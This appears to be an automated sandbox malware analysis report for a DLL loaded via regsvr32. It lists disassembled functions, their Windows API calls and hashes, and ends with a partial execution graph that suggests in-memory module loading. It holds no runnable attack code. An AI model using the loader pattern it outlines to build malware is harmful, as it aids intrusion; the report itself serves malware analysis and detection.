                                                                                                            • Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4
                                                                                                          • __strdup.LIBCMT ref: 100217D7
                                                                                                          • GetCurrentThread.KERNEL32 ref: 10021804
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 1002180D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                          • String ID:
                                                                                                          • API String ID: 4206445780-0
                                                                                                          • Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
                                                                                                          • Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Capture
                                                                                                          • String ID:
                                                                                                          • API String ID: 1665607226-0
                                                                                                          • Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
                                                                                                          • Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
                                                                                                          • swprintf.LIBCMT ref: 1002AC34
                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 22681860-0
                                                                                                          • Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
                                                                                                          • Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32 ref: 10027846
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027859
                                                                                                            • Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0
                                                                                                          • GetTopWindow.USER32(?), ref: 10027889
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item
                                                                                                          • String ID:
                                                                                                          • API String ID: 369458955-0
                                                                                                          • Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
                                                                                                          • Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
                                                                                                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
                                                                                                          • Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memsethtonsinet_addrsendto
                                                                                                          • String ID:
                                                                                                          • API String ID: 1158618643-0
                                                                                                          • Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
                                                                                                          • Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,2B815A64), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,2B815A64), ref: 100235D9
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ActiveEnable$FreeResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 253586258-0
                                                                                                          • Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
                                                                                                          • Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 100337DB
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 100337F2
                                                                                                          • __amsg_exit.LIBCMT ref: 10033800
                                                                                                          • __lock.LIBCMT ref: 10033810
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3521780317-0
                                                                                                          • Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
                                                                                                          • Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
                                                                                                          • PathFindExtensionA.SHLWAPI(?), ref: 10021778
                                                                                                            • Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                            • Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                            • Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                                          • String ID: %s%s.dll
                                                                                                          • API String ID: 1311856149-1649984862
                                                                                                          • Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
                                                                                                          • Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499
                                                                                                          • __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003787B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 803148776-1018135373
                                                                                                          • Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
                                                                                                          • Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 10002B47
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 4100373531-0
                                                                                                          • Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
                                                                                                          • Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                          • LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$Exception@8InitializeLeaveThrow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3253506028-0
                                                                                                          • Opcode ID: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction ID: 3062035623b9543bfb964b4a27d18fc4dd6f5ea10993a44c93a1de297aa0e807
                                                                                                          • Opcode Fuzzy Hash: feb1692b13d847297fc57938e43eb050cd6bddea5eb79fc1efedc9f05588c2f0
                                                                                                          • Instruction Fuzzy Hash: 48F09672900355AFEB009F68DCCCB09B7AAFBD6261FDB0017F14486122DF3499C5CAA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:5.2%
                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:452
                                                                                                          Total number of Limit Nodes:17

                                                                                                          Graph

                                                                                                          execution_graph 21113 100036a0 21116 1002e654 21113->21116 21117 1002e707 21116->21117 21127 1002e666 21116->21127 21141 1003654f 6 API calls __decode_pointer 21117->21141 21119 1002e70d 21142 10030d24 67 API calls __getptd_noexit 21119->21142 21124 1002e6c3 RtlAllocateHeap 21124->21127 21125 1002e677 21125->21127 21134 10036507 67 API calls 2 library calls 21125->21134 21135 1003635c 67 API calls 7 library calls 21125->21135 21136 100306e0 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 21125->21136 21127->21124 21127->21125 21128 1002e6f3 21127->21128 21131 1002e6f8 21127->21131 21133 100036c0 21127->21133 21137 1002e605 67 API calls 4 library calls 21127->21137 21138 1003654f 6 API calls __decode_pointer 21127->21138 21139 10030d24 67 API calls __getptd_noexit 21128->21139 21140 10030d24 67 API calls __getptd_noexit 21131->21140 21134->21125 21135->21125 21137->21127 21138->21127 21139->21131 21140->21133 21141->21119 21142->21133 21143 10003440 21144 1000344f 21143->21144 21146 10003454 21143->21146 21149 100033f0 67 API calls _malloc 21144->21149 21147 1002e654 _malloc 67 API calls 21146->21147 21148 10003464 21146->21148 21147->21148 21149->21146 21150 10003160 21153 10002d40 21150->21153 21188 100024a0 21153->21188 21156 10002d83 SetLastError 21180 10002d69 21156->21180 21157 10002d95 21158 100024a0 SetLastError 21157->21158 21159 10002dae 21158->21159 21160 10002dd0 SetLastError 21159->21160 21161 10002de2 21159->21161 21159->21180 21160->21180 21162 10002df1 SetLastError 21161->21162 21163 10002e03 21161->21163 21162->21180 21164 10002e0e SetLastError 21163->21164 21168 10002e20 GetNativeSystemInfo 21163->21168 21164->21180 21166 10002ed4 SetLastError 21166->21180 21167 10002ee6 VirtualAlloc 21169 10002f32 GetProcessHeap HeapAlloc 21167->21169 21170 10002f07 VirtualAlloc 21167->21170 21168->21166 21168->21167 21172 10002f6c 21169->21172 21173 10002f4c VirtualFree SetLastError 21169->21173 21170->21169 21171 10002f23 SetLastError 21170->21171 21171->21180 21174 100024a0 SetLastError 21172->21174 21173->21180 21175 10002fce 21174->21175 21176 10002fdc VirtualAlloc 21175->21176 21186 10002fd2 21175->21186 21177 1000300b 21176->21177 21191 100024d0 21177->21191 21181 1000303f 21181->21186 21201 10002ab0 21181->21201 21185 100030a8 21185->21186 21187 1000310f SetLastError 21185->21187 21186->21180 21220 10003310 VirtualFree VirtualFree GetProcessHeap HeapFree 21186->21220 21187->21186 21189 100024bb 21188->21189 21190 100024af SetLastError 21188->21190 21189->21156 21189->21157 21189->21180 21190->21189 21192 10002500 21191->21192 21193 10002593 21192->21193 21195 1000253c VirtualAlloc 21192->21195 21200 100025b0 21192->21200 21194 100024a0 SetLastError 21193->21194 21198 